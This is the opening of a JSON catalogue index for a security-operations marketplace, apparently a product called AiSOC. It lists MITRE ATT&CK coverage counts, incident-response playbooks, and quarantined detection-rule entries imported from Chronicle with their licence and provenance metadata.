{ "$schema": "https://example.com/schemas/marketplace/v1.json", "version": "1.0.0", "generated": "2026-05-14T12:28:24Z", "categories": [ { "id": "playbooks", "label": "Response Playbooks", "description": "Automated incident-response workflows triggered by alerts or manual invocation." }, { "id": "detections", "label": "Detection Rules", "description": "Curated YAML rules for identifying malicious or suspicious activity across cloud, identity, endpoint, network, application, and data-exfil categories." }, { "id": "plugins", "label": "Plugins", "description": "Reference connectors, enrichers, actions, and widgets shipped with both Python and Go SDK implementations for cross-language parity." } ], "stats": { "total": 7117, "playbooks": 62, "detections": 6998, "plugins": 57, "verified": 996, "community": 1, "by_tier": { "beta": 7, "community": 1, "imported": 6113, "stable": 996 }, "detections_by_tier": { "community": 1, "imported": 6113, "stable": 884 }, "quarantined": 5921 }, "mitre_coverage": { "techniques": { "T1001.003": 2, "T1003": 51, "T1003.001": 87, "T1003.002": 37, "T1003.003": 31, "T1003.004": 13, "T1003.005": 9, "T1003.006": 13, "T1003.008": 5, "T1005": 18, "T1006": 1, "T1007": 11, "T1008": 5, "T1010": 2, "T1011": 1, "T1012": 24, "T1014": 8, "T1016": 20, "T1016.001": 1, "T1018": 42, "T1020": 12, "T1020.001": 1, "T1021": 26, "T1021.001": 34, "T1021.002": 54, "T1021.003": 23, "T1021.004": 13, "T1021.005": 1, "T1021.006": 22, "T1021.007": 5, "T1025": 3, "T1027": 103, "T1027.001": 3, "T1027.002": 1, "T1027.003": 5, "T1027.004": 6, "T1027.005": 6, "T1027.009": 1, "T1027.010": 9, "T1027.011": 3, "T1027.013": 1, "T1029": 1, "T1030": 6, "T1033": 45, "T1036": 50, "T1036.002": 5, "T1036.003": 36, "T1036.004": 2, "T1036.005": 21, "T1036.006": 1, "T1036.007": 3, "T1036.008": 3, "T1036.009": 2, "T1037": 3, "T1037.001": 5, "T1037.002": 2, "T1037.004": 3, "T1037.005": 1, "T1039": 4, "T1040": 14, "T1041": 20, "T1046": 33, "T1047": 72, "T1048": 15, "T1048.001": 1, "T1048.003": 19, "T1049": 16, "T1052": 2, "T1052.001": 1, "T1053": 22, "T1053.001": 1, "T1053.002": 12, "T1053.003": 21, "T1053.005": 58, "T1053.006": 6, "T1053.007": 2, "T1055": 56, "T1055.001": 11, "T1055.002": 4, "T1055.003": 3, "T1055.004": 1, "T1055.009": 2, "T1055.011": 1, "T1055.012": 6, "T1055.013": 1, "T1056": 2, "T1056.001": 4, "T1056.002": 4, "T1057": 8, "T1059": 121, "T1059.001": 243, "T1059.002": 11, "T1059.003": 41, "T1059.004": 29, "T1059.005": 31, "T1059.006": 4, "T1059.007": 25, "T1059.009": 4, "T1059.012": 9, "T1059.013": 1, "T1068": 38, "T1069": 8, "T1069.001": 29, "T1069.002": 35, "T1069.003": 4, "T1070": 35, "T1070.001": 8, "T1070.002": 1, "T1070.003": 13, "T1070.004": 28, "T1070.005": 5, "T1070.006": 6, "T1070.008": 7, "T1071": 14, "T1071.001": 54, "T1071.002": 1, "T1071.003": 3, "T1071.004": 23, "T1072": 9, "T1074": 3, "T1074.001": 6, "T1078": 128, "T1078.001": 10, "T1078.002": 14, "T1078.003": 11, "T1078.004": 98, "T1082": 49, "T1083": 28, "T1087": 21, "T1087.001": 28, "T1087.002": 52, "T1087.004": 10, "T1090": 29, "T1090.001": 8, "T1090.002": 3, "T1090.003": 11, "T1091": 5, "T1095": 8, "T1098": 88, "T1098.001": 26, "T1098.002": 6, "T1098.003": 34, "T1098.004": 12, "T1098.005": 7, "T1098.007": 1, "T1102": 17, "T1102.001": 4, "T1102.002": 5, "T1102.003": 2, "T1105": 118, "T1106": 11, "T1110": 57, "T1110.001": 18, "T1110.002": 1, "T1110.003": 44, "T1110.004": 16, "T1112": 164, "T1113": 16, "T1114": 6, "T1114.001": 7, "T1114.002": 16, "T1114.003": 12, "T1115": 11, "T1119": 8, "T1120": 2, "T1123": 9, "T1124": 4, "T1125": 1, "T1127": 23, "T1127.001": 6, "T1129": 2, "T1132.001": 4, "T1133": 67, "T1134": 6, "T1134.001": 13, "T1134.002": 7, "T1134.003": 3, "T1134.004": 3, "T1134.005": 5, "T1135": 15, "T1136": 11, "T1136.001": 32, "T1136.002": 7, "T1136.003": 24, "T1137": 11, "T1137.002": 2, "T1137.003": 1, "T1137.006": 4, "T1140": 18, "T1176": 1, "T1176.001": 3, "T1185": 12, "T1187": 12, "T1189": 4, "T1190": 177, "T1195": 23, "T1195.001": 2, "T1195.002": 17, "T1197": 23, "T1199": 16, "T1200": 13, "T1201": 14, "T1202": 45, "T1203": 28, "T1204": 37, "T1204.001": 7, "T1204.002": 50, "T1204.003": 10, "T1204.004": 6, "T1207": 8, "T1210": 13, "T1211": 4, "T1212": 8, "T1213": 10, "T1213.002": 2, "T1213.003": 5, "T1216": 14, "T1216.001": 2, "T1217": 4, "T1218": 156, "T1218.001": 10, "T1218.002": 2, "T1218.003": 12, "T1218.004": 7, "T1218.005": 21, "T1218.007": 17, "T1218.008": 11, "T1218.009": 10, "T1218.010": 24, "T1218.011": 49, "T1218.012": 1, "T1218.013": 3, "T1218.014": 6, "T1219": 19, "T1219.002": 41, "T1220": 8, "T1221": 1, "T1222": 9, "T1222.001": 22, "T1222.002": 9, "T1404": 2, "T1480": 1, "T1482": 31, "T1484": 13, "T1484.001": 16, "T1484.002": 6, "T1485": 83, "T1485.001": 2, "T1486": 27, "T1489": 38, "T1490": 48, "T1491": 2, "T1491.001": 4, "T1495": 1, "T1496": 15, "T1497": 7, "T1497.001": 3, "T1497.003": 3, "T1498": 12, "T1498.001": 2, "T1498.002": 3, "T1499": 6, "T1499.001": 1, "T1499.004": 3, "T1505": 4, "T1505.001": 7, "T1505.002": 3, "T1505.003": 41, "T1505.004": 14, "T1505.005": 1, "T1505.006": 1, "T1518": 5, "T1518.001": 7, "T1525": 9, "T1526": 11, "T1528": 28, "T1529": 16, "T1530": 46, "T1531": 20, "T1535": 6, "T1537": 23, "T1538": 1, "T1539": 7, "T1542": 1, "T1542.001": 4, "T1542.003": 2, "T1542.005": 1, "T1543": 25, "T1543.001": 8, "T1543.002": 5, "T1543.003": 60, "T1543.004": 4, "T1546": 15, "T1546.001": 7, "T1546.002": 6, "T1546.003": 17, "T1546.004": 6, "T1546.007": 4, "T1546.008": 7, "T1546.009": 2, "T1546.010": 2, "T1546.011": 10, "T1546.012": 5, "T1546.013": 3, "T1546.014": 2, "T1546.015": 12, "T1547": 15, "T1547.001": 40, "T1547.002": 1, "T1547.003": 2, "T1547.004": 4, "T1547.005": 4, "T1547.006": 16, "T1547.008": 2, "T1547.009": 4, "T1547.010": 6, "T1547.012": 7, "T1547.014": 3, "T1547.015": 3, "T1548": 34, "T1548.001": 12, "T1548.002": 76, "T1548.003": 39, "T1548.004": 1, "T1550": 13, "T1550.001": 4, "T1550.002": 7, "T1550.003": 9, "T1550.004": 2, "T1552": 21, "T1552.001": 38, "T1552.002": 7, "T1552.003": 3, "T1552.004": 14, "T1552.005": 3, "T1552.006": 7, "T1552.007": 9, "T1553": 4, "T1553.001": 7, "T1553.002": 2, "T1553.003": 4, "T1553.004": 13, "T1553.005": 11, "T1554": 10, "T1555": 13, "T1555.001": 7, "T1555.003": 15, "T1555.004": 6, "T1555.005": 5, "T1556": 72, "T1556.001": 1, "T1556.002": 3, "T1556.003": 1, "T1556.004": 3, "T1556.006": 28, "T1556.007": 1, "T1557": 13, "T1557.001": 19, "T1557.002": 6, "T1557.003": 1, "T1558": 11, "T1558.001": 3, "T1558.002": 2, "T1558.003": 28, "T1558.004": 10, "T1559": 6, "T1559.001": 4, "T1559.002": 1, "T1560": 6, "T1560.001": 22, "T1561.001": 2, "T1561.002": 4, "T1562": 28, "T1562.001": 137, "T1562.002": 13, "T1562.003": 2, "T1562.004": 18, "T1562.006": 4, "T1562.007": 8, "T1562.008": 32, "T1562.012": 5, "T1563.002": 4, "T1564": 14, "T1564.001": 10, "T1564.002": 4, "T1564.003": 11, "T1564.004": 25, "T1564.006": 3, "T1564.008": 4, "T1565": 3, "T1565.001": 11, "T1565.002": 3, "T1566": 30, "T1566.001": 52, "T1566.002": 14, "T1566.003": 1, "T1567": 33, "T1567.001": 2, "T1567.002": 23, "T1568": 1, "T1568.001": 2, "T1568.002": 4, "T1569": 5, "T1569.001": 1, "T1569.002": 50, "T1570": 10, "T1571": 9, "T1572": 38, "T1573": 7, "T1573.002": 12, "T1574": 14, "T1574.001": 95, "T1574.002": 4, "T1574.005": 2, "T1574.006": 10, "T1574.007": 2, "T1574.008": 1, "T1574.009": 1, "T1574.011": 13, "T1574.012": 2, "T1574.014": 1, "T1578": 1, "T1578.002": 2, "T1578.003": 1, "T1578.005": 1, "T1580": 6, "T1583.001": 4, "T1583.006": 1, "T1584": 3, "T1586": 3, "T1586.003": 36, "T1587": 3, "T1587.001": 8, "T1587.002": 1, "T1587.003": 1, "T1588": 2, "T1588.001": 1, "T1588.002": 13, "T1588.004": 1, "T1589": 1, "T1589.001": 2, "T1589.002": 2, "T1590": 3, "T1590.001": 2, "T1590.002": 2, "T1590.005": 4, "T1591.004": 2, "T1592": 6, "T1592.001": 1, "T1592.004": 3, "T1593.003": 2, "T1595": 7, "T1595.001": 1, "T1595.002": 7, "T1598": 1, "T1598.002": 1, "T1599": 1, "T1599.001": 1, "T1600.001": 1, "T1601.001": 1, "T1606": 2, "T1606.002": 1, "T1608": 2, "T1608.003": 1, "T1609": 4, "T1610": 12, "T1611": 29, "T1612": 1, "T1613": 1, "T1614.001": 2, "T1615": 5, "T1619": 1, "T1620": 6, "T1621": 25, "T1622": 1, "T1647": 2, "T1649": 22, "T1653": 1, "T1654": 1, "T1656": 1, "T1659": 1, "T1673": 2, "T1685": 156, "T1685.001": 26, "T1685.002": 3, "T1685.004": 1, "T1685.005": 6, "T1685.006": 4, "T1686": 7, "T1686.001": 5, "T1686.003": 17, "T1689": 1, "T1690": 1 }, "unique_techniques": 493, "total_with_mitre": 5782, "by_tier": { "community": { "T1078.004": 1 }, "stable": { "T1003": 2, "T1003.001": 3, "T1003.002": 1, "T1003.003": 2, "T1003.006": 3, "T1003.008": 2, "T1011": 1, "T1014": 2, "T1018": 5, "T1020": 2, "T1021": 1, "T1021.001": 2, "T1021.002": 7, "T1021.004": 1, "T1021.006": 3, "T1027": 5, "T1030": 1, "T1036.005": 1, "T1037": 2, "T1037.001": 1, "T1037.002": 1, "T1037.004": 2, "T1040": 2, "T1041": 8, "T1046": 2, "T1047": 3, "T1048": 1, "T1048.003": 2, "T1052": 2, "T1052.001": 1, "T1053.001": 1, "T1053.003": 5, "T1053.005": 4, "T1053.006": 2, "T1055": 2, "T1055.001": 1, "T1055.012": 1, "T1056.001": 1, "T1059": 8, "T1059.001": 5, "T1059.002": 3, "T1059.004": 8, "T1059.005": 1, "T1068": 3, "T1069.003": 1, "T1070": 3, "T1070.001": 3, "T1070.002": 1, "T1070.003": 2, "T1071": 4, "T1071.001": 10, "T1071.004": 5, "T1074.001": 1, "T1078": 37, "T1078.001": 4, "T1078.002": 3, "T1078.003": 1, "T1078.004": 38, "T1083": 2, "T1087.001": 2, "T1087.002": 5, "T1087.004": 3, "T1090": 3, "T1090.003": 6, "T1095": 3, "T1098": 29, "T1098.001": 21, "T1098.003": 8, "T1098.004": 8, "T1098.007": 1, "T1105": 3, "T1110": 9, "T1110.001": 4, "T1110.003": 4, "T1110.004": 4, "T1112": 1, "T1113": 2, "T1114.002": 5, "T1114.003": 4, "T1127.001": 1, "T1133": 13, "T1134": 1, "T1135": 3, "T1136": 3, "T1136.001": 5, "T1136.003": 2, "T1140": 1, "T1176": 1, "T1185": 1, "T1190": 30, "T1195": 2, "T1195.002": 10, "T1197": 1, "T1199": 15, "T1204": 2, "T1204.001": 1, "T1204.002": 5, "T1212": 2, "T1213": 3, "T1213.002": 1, "T1218": 1, "T1218.003": 1, "T1218.004": 1, "T1218.005": 2, "T1218.010": 1, "T1218.011": 4, "T1219": 1, "T1222.001": 2, "T1222.002": 1, "T1404": 2, "T1482": 1, "T1484.001": 2, "T1484.002": 2, "T1485": 28, "T1486": 8, "T1489": 2, "T1490": 7, "T1496": 2, "T1498": 4, "T1498.001": 2, "T1498.002": 2, "T1499": 1, "T1505.003": 3, "T1525": 8, "T1528": 6, "T1530": 36, "T1531": 5, "T1535": 1, "T1537": 10, "T1539": 4, "T1542.001": 1, "T1543": 1, "T1543.001": 4, "T1543.002": 3, "T1543.003": 3, "T1543.004": 2, "T1546.002": 1, "T1546.003": 3, "T1546.004": 2, "T1546.010": 1, "T1546.011": 1, "T1546.012": 1, "T1546.014": 1, "T1546.015": 1, "T1547": 3, "T1547.001": 4, "T1547.004": 1, "T1547.005": 2, "T1547.006": 6, "T1547.010": 1, "T1547.015": 2, "T1548": 1, "T1548.001": 6, "T1548.002": 4, "T1548.003": 3, "T1548.004": 1, "T1550": 3, "T1550.002": 2, "T1550.003": 1, "T1550.004": 1, "T1552": 1, "T1552.001": 12, "T1552.004": 2, "T1552.005": 2, "T1552.007": 1, "T1553": 1, "T1553.001": 5, "T1553.002": 1, "T1553.004": 2, "T1554": 1, "T1555": 1, "T1555.001": 5, "T1555.003": 3, "T1555.004": 1, "T1555.005": 1, "T1556": 41, "T1556.001": 1, "T1556.003": 1, "T1556.004": 1, "T1556.006": 14, "T1556.007": 1, "T1557": 2, "T1557.001": 5, "T1557.002": 3, "T1558.001": 2, "T1558.002": 2, "T1558.003": 5, "T1558.004": 4, "T1560.001": 3, "T1561.002": 1, "T1562": 5, "T1562.001": 40, "T1562.004": 7, "T1562.006": 2, "T1562.007": 1, "T1562.008": 13, "T1562.012": 2, "T1564.001": 1, "T1564.008": 1, "T1565.001": 4, "T1565.002": 1, "T1566": 3, "T1566.001": 2, "T1566.002": 2, "T1566.003": 1, "T1567": 12, "T1567.002": 7, "T1568.001": 2, "T1568.002": 2, "T1570": 3, "T1572": 9, "T1573": 1, "T1573.002": 7, "T1574": 1, "T1574.002": 4, "T1574.006": 3, "T1578.002": 1, "T1583.001": 4, "T1592": 2, "T1595.002": 1, "T1599": 1, "T1600.001": 1, "T1606.002": 1, "T1609": 1, "T1610": 12, "T1611": 25, "T1612": 1, "T1620": 2, "T1621": 5, "T1647": 1, "T1656": 1, "T1659": 1 }, "imported": { "T1001.003": 2, "T1003": 49, "T1003.001": 84, "T1003.002": 36, "T1003.003": 29, "T1003.004": 13, "T1003.005": 9, "T1003.006": 10, "T1003.008": 3, "T1005": 18, "T1006": 1, "T1007": 11, "T1008": 5, "T1010": 2, "T1012": 24, "T1014": 6, "T1016": 20, "T1016.001": 1, "T1018": 37, "T1020": 10, "T1020.001": 1, "T1021": 25, "T1021.001": 32, "T1021.002": 47, "T1021.003": 23, "T1021.004": 12, "T1021.005": 1, "T1021.006": 19, "T1021.007": 5, "T1025": 3, "T1027": 98, "T1027.001": 3, "T1027.002": 1, "T1027.003": 5, "T1027.004": 6, "T1027.005": 6, "T1027.009": 1, "T1027.010": 9, "T1027.011": 3, "T1027.013": 1, "T1029": 1, "T1030": 5, "T1033": 45, "T1036": 50, "T1036.002": 5, "T1036.003": 36, "T1036.004": 2, "T1036.005": 20, "T1036.006": 1, "T1036.007": 3, "T1036.008": 3, "T1036.009": 2, "T1037": 1, "T1037.001": 4, "T1037.002": 1, "T1037.004": 1, "T1037.005": 1, "T1039": 4, "T1040": 12, "T1041": 12, "T1046": 31, "T1047": 69, "T1048": 14, "T1048.001": 1, "T1048.003": 17, "T1049": 16, "T1053": 22, "T1053.002": 12, "T1053.003": 16, "T1053.005": 54, "T1053.006": 4, "T1053.007": 2, "T1055": 54, "T1055.001": 10, "T1055.002": 4, "T1055.003": 3, "T1055.004": 1, "T1055.009": 2, "T1055.011": 1, "T1055.012": 5, "T1055.013": 1, "T1056": 2, "T1056.001": 3, "T1056.002": 4, "T1057": 8, "T1059": 113, "T1059.001": 238, "T1059.002": 8, "T1059.003": 41, "T1059.004": 21, "T1059.005": 30, "T1059.006": 4, "T1059.007": 25, "T1059.009": 4, "T1059.012": 9, "T1059.013": 1, "T1068": 35, "T1069": 8, "T1069.001": 29, "T1069.002": 35, "T1069.003": 3, "T1070": 32, "T1070.001": 5, "T1070.003": 11, "T1070.004": 28, "T1070.005": 5, "T1070.006": 6, "T1070.008": 7, "T1071": 10, "T1071.001": 44, "T1071.002": 1, "T1071.003": 3, "T1071.004": 18, "T1072": 9, "T1074": 3, "T1074.001": 5, "T1078": 91, "T1078.001": 6, "T1078.002": 11, "T1078.003": 10, "T1078.004": 59, "T1082": 49, "T1083": 26, "T1087": 21, "T1087.001": 26, "T1087.002": 47, "T1087.004": 7, "T1090": 26, "T1090.001": 8, "T1090.002": 3, "T1090.003": 5, "T1091": 5, "T1095": 5, "T1098": 59, "T1098.001": 5, "T1098.002": 6, "T1098.003": 26, "T1098.004": 4, "T1098.005": 7, "T1102": 17, "T1102.001": 4, "T1102.002": 5, "T1102.003": 2, "T1105": 115, "T1106": 11, "T1110": 48, "T1110.001": 14, "T1110.002": 1, "T1110.003": 40, "T1110.004": 12, "T1112": 163, "T1113": 14, "T1114": 6, "T1114.001": 7, "T1114.002": 11, "T1114.003": 8, "T1115": 11, "T1119": 8, "T1120": 2, "T1123": 9, "T1124": 4, "T1125": 1, "T1127": 23, "T1127.001": 5, "T1129": 2, "T1132.001": 4, "T1133": 54, "T1134": 5, "T1134.001": 13, "T1134.002": 7, "T1134.003": 3, "T1134.004": 3, "T1134.005": 5, "T1135": 12, "T1136": 8, "T1136.001": 27, "T1136.002": 7, "T1136.003": 22, "T1137": 11, "T1137.002": 2, "T1137.003": 1, "T1137.006": 4, "T1140": 17, "T1176.001": 3, "T1185": 11, "T1187": 12, "T1189": 4, "T1190": 147, "T1195": 21, "T1195.001": 2, "T1195.002": 7, "T1197": 22, "T1199": 1, "T1200": 13, "T1201": 14, "T1202": 45, "T1203": 28, "T1204": 35, "T1204.001": 6, "T1204.002": 45, "T1204.003": 10, "T1204.004": 6, "T1207": 8, "T1210": 13, "T1211": 4, "T1212": 6, "T1213": 7, "T1213.002": 1, "T1213.003": 5, "T1216": 14, "T1216.001": 2, "T1217": 4, "T1218": 155, "T1218.001": 10, "T1218.002": 2, "T1218.003": 11, "T1218.004": 6, "T1218.005": 19, "T1218.007": 17, "T1218.008": 11, "T1218.009": 10, "T1218.010": 23, "T1218.011": 45, "T1218.012": 1, "T1218.013": 3, "T1218.014": 6, "T1219": 18, "T1219.002": 41, "T1220": 8, "T1221": 1, "T1222": 9, "T1222.001": 20, "T1222.002": 8, "T1480": 1, "T1482": 30, "T1484": 13, "T1484.001": 14, "T1484.002": 4, "T1485": 55, "T1485.001": 2, "T1486": 19, "T1489": 36, "T1490": 41, "T1491": 2, "T1491.001": 4, "T1495": 1, "T1496": 13, "T1497": 7, "T1497.001": 3, "T1497.003": 3, "T1498": 8, "T1498.002": 1, "T1499": 5, "T1499.001": 1, "T1499.004": 3, "T1505": 4, "T1505.001": 7, "T1505.002": 3, "T1505.003": 38, "T1505.004": 14, "T1505.005": 1, "T1505.006": 1, "T1518": 5, "T1518.001": 7, "T1525": 1, "T1526": 11, "T1528": 22, "T1529": 16, "T1530": 10, "T1531": 15, "T1535": 5, "T1537": 13, "T1538": 1, "T1539": 3, "T1542": 1, "T1542.001": 3, "T1542.003": 2, "T1542.005": 1, "T1543": 24, "T1543.001": 4, "T1543.002": 2, "T1543.003": 57, "T1543.004": 2, "T1546": 15, "T1546.001": 7, "T1546.002": 5, "T1546.003": 14, "T1546.004": 4, "T1546.007": 4, "T1546.008": 7, "T1546.009": 2, "T1546.010": 1, "T1546.011": 9, "T1546.012": 4, "T1546.013": 3, "T1546.014": 1, "T1546.015": 11, "T1547": 12, "T1547.001": 36, "T1547.002": 1, "T1547.003": 2, "T1547.004": 3, "T1547.005": 2, "T1547.006": 10, "T1547.008": 2, "T1547.009": 4, "T1547.010": 5, "T1547.012": 7, "T1547.014": 3, "T1547.015": 1, "T1548": 33, "T1548.001": 6, "T1548.002": 72, "T1548.003": 36, "T1550": 10, "T1550.001": 4, "T1550.002": 5, "T1550.003": 8, "T1550.004": 1, "T1552": 20, "T1552.001": 26, "T1552.002": 7, "T1552.003": 3, "T1552.004": 12, "T1552.005": 1, "T1552.006": 7, "T1552.007": 8, "T1553": 3, "T1553.001": 2, "T1553.002": 1, "T1553.003": 4, "T1553.004": 11, "T1553.005": 11, "T1554": 9, "T1555": 12, "T1555.001": 2, "T1555.003": 12, "T1555.004": 5, "T1555.005": 4, "T1556": 31, "T1556.002": 3, "T1556.004": 2, "T1556.006": 14, "T1557": 11, "T1557.001": 14, "T1557.002": 3, "T1557.003": 1, "T1558": 11, "T1558.001": 1, "T1558.003": 23, "T1558.004": 6, "T1559": 6, "T1559.001": 4, "T1559.002": 1, "T1560": 6, "T1560.001": 19, "T1561.001": 2, "T1561.002": 3, "T1562": 23, "T1562.001": 97, "T1562.002": 13, "T1562.003": 2, "T1562.004": 11, "T1562.006": 2, "T1562.007": 7, "T1562.008": 19, "T1562.012": 3, "T1563.002": 4, "T1564": 14, "T1564.001": 9, "T1564.002": 4, "T1564.003": 11, "T1564.004": 25, "T1564.006": 3, "T1564.008": 3, "T1565": 3, "T1565.001": 7, "T1565.002": 2, "T1566": 27, "T1566.001": 50, "T1566.002": 12, "T1567": 21, "T1567.001": 2, "T1567.002": 16, "T1568": 1, "T1568.002": 2, "T1569": 5, "T1569.001": 1, "T1569.002": 50, "T1570": 7, "T1571": 9, "T1572": 29, "T1573": 6, "T1573.002": 5, "T1574": 13, "T1574.001": 95, "T1574.005": 2, "T1574.006": 7, "T1574.007": 2, "T1574.008": 1, "T1574.009": 1, "T1574.011": 13, "T1574.012": 2, "T1574.014": 1, "T1578": 1, "T1578.002": 1, "T1578.003": 1, "T1578.005": 1, "T1580": 6, "T1583.006": 1, "T1584": 3, "T1586": 3, "T1586.003": 36, "T1587": 3, "T1587.001": 8, "T1587.002": 1, "T1587.003": 1, "T1588": 2, "T1588.001": 1, "T1588.002": 13, "T1588.004": 1, "T1589": 1, "T1589.001": 2, "T1589.002": 2, "T1590": 3, "T1590.001": 2, "T1590.002": 2, "T1590.005": 4, "T1591.004": 2, "T1592": 4, "T1592.001": 1, "T1592.004": 3, "T1593.003": 2, "T1595": 7, "T1595.001": 1, "T1595.002": 6, "T1598": 1, "T1598.002": 1, "T1599.001": 1, "T1601.001": 1, "T1606": 2, "T1608": 2, "T1608.003": 1, "T1609": 3, "T1611": 4, "T1613": 1, "T1614.001": 2, "T1615": 5, "T1619": 1, "T1620": 4, "T1621": 20, "T1622": 1, "T1647": 1, "T1649": 22, "T1653": 1, "T1654": 1, "T1673": 2, "T1685": 156, "T1685.001": 26, "T1685.002": 3, "T1685.004": 1, "T1685.005": 6, "T1685.006": 4, "T1686": 7, "T1686.001": 5, "T1686.003": 17, "T1689": 1, "T1690": 1 } } }, "items": [ { "id": "account-takeover-response-v1", "type": "detection", "name": "Account Takeover Response", "description": "Responds to suspected account takeover (ATO) events. Forces session termination, resets credentials, enables MFA enforcement, and notifies the user and security team.", "version": "1.0.0", "author": "Beenu - beenu@cyble.com", "tags": [ "account-takeover", "identity", "iam", "credential-compromise" ], "severity": null, "category": "playbooks", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/playbooks/account-takeover-response.yaml" }, { "id": "anomalous-behavior-response-v1", "type": "detection", "name": "Anomalous User Behavior Response", "description": "Responds to anomalous user behavior flagged by UEBA systems including unusual access patterns, after-hours activity, mass data access, or deviation from behavioral baselines. Escalates based on risk score and enables adaptive authentication controls.", "version": "1.0.0", "author": "Beenu - beenu@cyble.com", "tags": [ "anomalous", "ueba", "behavioral-analytics", "identity", "insider" ], "severity": null, "category": "playbooks", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/playbooks/anomalous-behavior-response.yaml" }, { "id": "bec-response-v1", "type": "detection", "name": "Business Email Compromise (BEC) Response", "description": "Responds to Business Email Compromise alerts. Identifies spoofed or compromised executive accounts used to initiate fraudulent wire transfers or sensitive data requests. Blocks sender, alerts finance/legal, and coordinates with email gateway.", "version": "1.0.0", "author": "Beenu - beenu@cyble.com", "tags": [ "bec", "email", "fraud", "executive", "financial-fraud" ], "severity": null, "category": "playbooks", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/playbooks/bec-response.yaml" }, { "id": "brute-force-response-v1", "type": "detection", "name": "Brute Force Attack Response", "description": "Responds to brute force and credential stuffing attacks against authentication endpoints. Implements progressive lockout, blocks attacking IPs, enables CAPTCHA enforcement, and notifies the security team.", "version": "1.0.0", "author": "Beenu - beenu@cyble.com", "tags": [ "brute-force", "credential-stuffing", "authentication", "network", "identity" ], "severity": null, "category": "playbooks", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/playbooks/brute-force-response.yaml" }, { "id": "chronicle-detection-rules-a-scheduled-task-was-created", "type": "detection", "name": "a_scheduled_task_was_created", "description": "a_scheduled_task_was_created", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/a-scheduled-task-was-created.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "a_scheduled_task_was_created", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/sysmon/a_scheduled_task_was_created.yaral" } }, { "id": "chronicle-detection-rules-a-variant-of-data-stealer-trojan-activity", "type": "detection", "name": "a_variant_of_data_stealer_trojan_activity", "description": "a_variant_of_data_stealer_trojan_activity", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/a-variant-of-data-stealer-trojan-activity.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "a_variant_of_data_stealer_trojan_activity", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/sysmon/a_variant_of_data_stealer__trojan_activity.yaral" } }, { "id": "chronicle-detection-rules-a-variant-of-lokibot-trojan", "type": "detection", "name": "a_variant_of_lokibot_trojan", "description": "a_variant_of_lokibot_trojan", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/a-variant-of-lokibot-trojan.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "a_variant_of_lokibot_trojan", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/sysmon/a_variant_of_lokibot_trojan.yaral" } }, { "id": "chronicle-detection-rules-a-webshell-ensiko-with-ransomware-capabilities", "type": "detection", "name": "a_webshell_ensiko_with_ransomware_capabilities", "description": "a_webshell_ensiko_with_ransomware_capabilities", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/a-webshell-ensiko-with-ransomware-capabilities.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "a_webshell_ensiko_with_ransomware_capabilities", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/webserver/a_webshell__ensiko__with_ransomware_capabilities.yaral" } }, { "id": "chronicle-detection-rules-abusing-attribexe-to-change-file-attributes", "type": "detection", "name": "abusing_attribexe_to_change_file_attributes", "description": "abusing_attribexe_to_change_file_attributes", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/abusing-attribexe-to-change-file-attributes.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "abusing_attribexe_to_change_file_attributes", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/windows/abusing_attrib_exe_to_change_file_attributes.yaral" } }, { "id": "chronicle-detection-rules-abusing-azure-browser-sso", "type": "detection", "name": "abusing_azure_browser_sso", "description": "abusing_azure_browser_sso", "version": "1.0.0", "author": 